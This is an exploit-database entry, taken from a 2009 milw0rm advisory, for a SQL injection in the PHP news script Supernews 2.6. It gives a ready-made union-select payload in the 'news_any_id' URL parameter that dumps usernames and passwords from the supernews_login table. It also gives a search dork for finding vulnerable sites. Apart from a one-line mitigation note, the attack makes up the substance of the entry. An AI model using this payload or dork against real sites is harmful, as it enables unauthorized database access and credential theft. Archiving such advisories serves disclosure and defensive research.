Supernews 2.6 SQL Injection Vulnability

vendor:

Supernews

by:

Observing and DD3str0y3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Supernews

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: NO

Related CWE: N/A

CPE: 2.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Supernews 2.6 SQL Injection Vulnability

A SQL injection vulnerability exists in Supernews 2.6. An attacker can exploit this vulnerability to gain access to the database by sending maliciously crafted requests to the server. The malicious requests can be sent via the 'news_any_id' parameter in the URL. An example of such a request is: http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################
	Supernews 2.6 SQL Injection Vulnability
###############################################################

Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817

###############################################################
	Discovered by Observing and DD3str0y3r
	   [Collaps3 CREW] - Made In Brazil
###############################################################

Dork: Supernews 2.6

#######################################################################################################################################

Example:
http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

#######################################################################################################################################

gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends

# milw0rm.com [2009-06-03]